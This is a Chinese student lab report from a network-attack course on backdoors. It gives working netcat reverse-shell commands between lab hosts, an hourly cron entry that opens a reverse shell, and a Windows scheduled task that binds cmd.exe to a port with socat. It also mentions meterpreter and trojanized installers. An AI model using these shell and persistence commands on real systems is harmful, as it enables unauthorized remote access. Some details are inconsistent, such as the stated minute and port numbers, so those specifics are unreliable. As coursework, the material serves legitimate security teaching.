标签:数据 自己 ali data 管理 杀毒软件 应用程序 编译 tab
(1)后门:是不经过正常认证流程而访问系统流程的通道。
(2)常见后门有:编译器后门、操作系统后门、应用程序后门、潜伏或伪装成特定应用的专用后门程序。
(3)布置后门的流程:<1>有一个后门程序;<2>将其放置在系统里;<3>使后门程序代码运行起来;<3>不被查杀软件查杀且不被防火墙发现。(常用技术有:反弹式连接;加密技术;隧道技术)。
(4)常用后门工具:
<1>netcat:又名nc、ncat。是一个底层工具,进行基本的TCP.UDP数据收发,常与其他工具结合使用作为后门。
Linux:自带netcat,输入man nc
查看其使用说明。
Windows: 下载ncat.rar工具包。
step1 首先在Windows中使用 ipconfig 查看主机IP地址 192.168.62.134
Step2:在ncat.exe文件目录下输入ncat.exe -l -p 5304
打开windows 监听
Step3:Linux反弹连接windows:nc 192.168.62.134 5304 -e /bin/sh
Step4:windows下获得一个linux shell,可运行任何指令,如ls,pwd
###### <2> Linux获得Win Shell
Step1:输入sudo ifconfig
查看到Linux端的IP地址为192.168.62.128
Step2:输入nc -l -p 5304
在Linux运行监听
Step3:在ncat.exe文件目录下输入ncat.exe -e cmd.exe 192.168.62.128 5304
,使Windows反弹连接Linux
Step4:Linux下看到Windows的命令提示,可运行指令,如dir,ipconfig
<2>meterpreter:是一个后门平台。其中有大量零件可调参数,用时组合可以生成可执行文件。
(5)后门启动:
任务计划程序——>新建任务计划——>触发器——>操作程序或脚本——>操作添加参数。
Cron是Linux下的定时任务,每一分钟运行一次,根据配置文件执行预设的指令。
Step1:crontab指令增加一条定时任务,"-e"表示编辑。
20175304@kali:~/Exp2$ crontab -e
Step2:选择编辑器并添加代码
因为是第一次编辑,故提示选择编辑器,我选择了2,并添加了下面这行代码,表示在每个小时的第20分钟执行后面的那条指令。
28 * * * * /bin/netcat 192.168.62.134 -e /bin/sh
Step3:保存、退出后配置即生效。
可以通过"crontab -l"来查看,"-l"表示list。下图为第28分钟执行代码后的结果:
socat,Netcat++,超级netcat工具。
Step1:右击计算机
—>点击管理
—>点击任务计划程序
—>点击创建任务
Step2:设置任务名,新建触发器
Step3:新建操作
在程序或脚本
中选择socat.exe文件的路径,添加参数中填写tcp-listen:5310 exec:cmd.exe,pty,stderr
,这个命令的作用是把cmd.exe
绑定到端口5215,同时把cmd.exe的stderr重定向到stdout上:
Step4:此时可以看到任务的状态为准备就绪
Step5:当时间到15:45时,此时可以看到任务的状态为正在运行,同时会弹出一个cmd窗口。
Step6:在kali中输入指令socat - tcp:192.168.3.13:5310
此时可以发现已经成功获得了一个shell,下图为输入ipconfig
和cd ..
的结果
答:攻击者通过interpreter制作一个恶意程序代码,通过绑定到相关应用软件安装包中。如果我正好下载了该安装包软件并点击运行,且该恶意代码违背杀毒软件成功查杀,则该后门成功进入到我的系统中。
答:1.开机自启动技术;
? 2.windows定时任务;
? 3.Linux的corn;
? 4.又是用户点击以启动;
? 5.木马化正常软件。
答:Meterpreter是一个后门平台,里面的help功能便于操作。。
20175304刘朝尹 2019-2020-3 《网络对抗技术》Exp2 后门原理与实践
标签:数据 自己 ali data 管理 杀毒软件 应用程序 编译 tab
原文地址:https://www.cnblogs.com/lcyll/p/12489936.html